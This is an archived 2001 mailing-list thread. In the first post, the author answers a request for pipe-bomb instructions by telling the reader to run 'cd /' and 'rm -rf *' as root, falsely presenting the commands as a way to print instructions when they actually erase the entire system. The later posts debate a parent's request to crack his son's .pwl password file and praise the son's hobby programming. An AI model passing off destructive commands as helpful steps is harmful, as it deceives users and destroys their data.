
@_date: 2001-02-08 11:06:44
@_author: Ralph Forsythe 
@_subject: can you get fire woks for me and pipe bombs 
Yes, but you have to be running a unix (i.e. Linux) system to get the instructions.  Once you are, log in as root and type these and the instructions will print to your computer screen:
   cd /
   rm -rf *

@_date: 2001-01-23 20:07:39
@_author: Ralph Forsythe 
@_subject: Excuse me, Mr. Blank Frank 
While I almost always refrain from posting in petty flame wars, this is
something I feel pretty strongly about, so...
First, I agree that Frank's response was most likely NOT the most
professional or courteous response to your question.  However, you argue
that talking is not the answer here, and I most vehemently disagree.  I
was raised with good moral standing, and I do think I know right from
wrong.  However I did not learn these things by being completely isolated
from the things in the world which are damaging.
Deception, filth, and dishonesty come from silence.  Open communication,
by simple definition of the term, serves to counteract these things.
Perhaps the answer isn't total isolation or silence, but to simply
communicate your message differently.  I also believe that a parent's
*number one* responsiblity in caring for their child is to protect them.
However, what will happen when that child (no longer a child) enters the
real world, where these things are NOT isolated from him anymore?
Innocence only lasts as long as ignorance.  What *will* make your son
determine right from wrong is the knowledge you provide now, today and
tomorrow, about these things.
I'm not flaming you or telling you how to raise your son, anymore than I
would want someone telling me how to raise mine.  (FWIW I am not a parent)
But I cannot agree that this is the right approach.  I can see religion is
a strong force in your life.  I don't share similar beliefs personally,
but I will fight to the death to protect someone's right to believe what
they choose.  My suggestion is to perhaps teach your message in this
framework, the keyword being /teach/.  communicate.  Share what you know,
what you learned from experience in your life, with your son.  ONLY with
that kind of open teaching and leadership will your son have the ability
to make those moral decisions on his own.
Oh -- the general feeling you received from the list regarding hacking
your son's .pwl files come from most of us thinking it's wrong to do that.
We all were taught, and learned, because someone took the time to share
with us what they knew.  No one is suggesting you let your son run rampant
through porn sites and the like, just that we've been there and know from
personal experience that approach will accomplish nothing.
Anyway, some food for thought...
- Ralph Forsythe
ralph at centerone.com
due me.  It's people like you -- or the perception that you tried to give
me of you that I am trying to protect my son against.  When deception, filth,
dishonesty, and the such as you have displayed rule this world ...
when talking isn't the answer, a parent has the responsibilty to care for
their child.  Perhaps you are not a parent, or you never had a parent that
cared enough to protect -- but, I am one that will fight to the bitter end to
protect the innocence of my children.  I simply asked for you assistance in
cracking the .pwl file and your response was nothing to do with that request.
  If you are unable to help me, no response would have been better than the
one you sent.  I'm sorry that misery seems to emmanate from you -- there's a
Peace that can be found in Your Creator ... may He bless you today.

@_date: 2001-01-23 23:28:41
@_author: Ralph Forsythe 
@_subject: Excuse me, Mr. Blank Frank 
These programs are not what I'd consider to be hacking programs, per se.
They are not gaining illegal access on anything, or doing any damage.  He
might be royally annoying some people on the net, but that's about it.
Actually, kudos to your son ... You have to understand that most people
using the programs like your son's have never taken the time to learn how
they work, but just download them and use them.  Very few people take the
time to write the code themselves; to learn how the processes take place,
or why what's happening is the way it is.
I'd imagine quite a few people on this list have, at one time or another,
written programs that do things to piss people off, but in the end cause
no real harm.  Some of us have written programs to crack password files
even, just to "see if we can".  That doesn't mean we're out there
downloading passwords and breaking into sites worldwide.  (Well, most of
us anyway...)
To be honest, it's exactly because I was able to tinker and try these
things out that I have a good paying job in the computer security field,
am respected by my peers, and continue to accomplish new things.  I
*absolutely* look back on my past and feel accomplishment.  If your son
was posting script kiddie crap like "I 0wn j00 l0053r5" (I owned you
loosers, in english) on web sites that would be different.  He's already
above that.  And that "hackers oath" is also exactly what defines the line
between maliscious and constructive behavior.
I don't know you, and I don't know your son.  But at least in regards to
this, DEFINITELY encourage him to keep at it if he likes it.  He'll likely
land a great job someday because of it.  Just make sure he knows where to
draw the line between constructive learning and illegal activity that
tends to make cops come to your house...
(Man I just feel all warm and fuzzy all of a sudden....)
- Ralph
